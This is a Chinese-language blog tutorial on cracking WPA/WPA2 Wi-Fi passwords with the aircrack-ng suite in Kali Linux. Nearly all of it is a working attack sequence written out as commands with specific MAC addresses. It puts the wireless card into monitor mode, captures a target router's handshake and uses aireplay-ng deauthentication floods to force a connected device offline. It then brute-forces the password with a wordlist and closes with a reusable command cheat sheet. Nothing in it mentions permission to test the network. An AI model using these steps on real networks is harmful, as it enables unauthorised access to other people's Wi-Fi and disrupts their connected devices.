[技术教程] 用aircrack-ng破解wifi密码

作者：CC下载站日期：2018-10-03 06:11:38 浏览：2469 分类：web

开始前，先连上无线网卡，因为虚拟机中的kali系统不用调用笔记本自带的无线网卡，所以需要一个外接无线网卡，然后接入kali系统。

输入 ifconfig -a 查看网卡，多了个 wlan0，说明网卡已经适配好，不然可能是驱动有问题。

开启monitor模式，这里有些进程会影响到monitor模式的开启，如果开启成功可忽略，不然就依提示操作。

按提示操作的结果：

监听网络，完了 Ctrl+C 退出。

主要参数说明：#BSSID ：路由器、AP的MAC地址# PWR ：信号强度，一看就是越小越强了# #Data ：传输的数据大小，大的可能在下载或看视频什么的# CH ：无线信道，要看准# ENC ：加密协议，自WPA2协议爆出重大安全漏洞，现已经出WPA3，坐等更新# ESSID ：这个就不用多说了，wifi名称，有中文可能会出现乱码哈

3. 目标有了，开始对其进行cap包的监听和获取，这里要让其中连接的设备重连才能抓包其握手包，可以慢慢等待，也可以使用deauth洪水攻击。

oot@huan:~#airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon// -w 后面的路径是存放握手包的

4. 另起窗口，我们用deauth洪水攻击，让其中的一台设备掉线，它掉线后会自动连接（除非别人在wifi设置中勾选掉了自动连接）

root@huan:~#aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon// -0 death模式，20为攻击次数，也可以设为0，就是一直攻击// -c 这里自然就是连接上的某台设备的MAC地址了，指定它，我们让它稳稳地掉线。

5. 话不多说，上字典（关键东西），让它慢慢破去吧

root@huan:~#aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap

6. 没错下一步操作，退出monitor模式，别忘了喔

aircrack-ng 爆破wifi密码 - 命令清单~#airmon-ng start [网卡] //开启monitor模式~#airodump-ng [网卡] //捕获附件的wifi信息~#airodump-ng -c [信道]--bssid [路由器MAC] -w [handshake-path] [网卡]~#aireplay-ng -0 [攻击次数值] -c [某连接设备MAC] -a [路由器MAC] [网卡]~#aircrack-ng -w [字典-path] [破解的目标握手包-path]~#airmon-ng stop [网卡] //退出monitor模式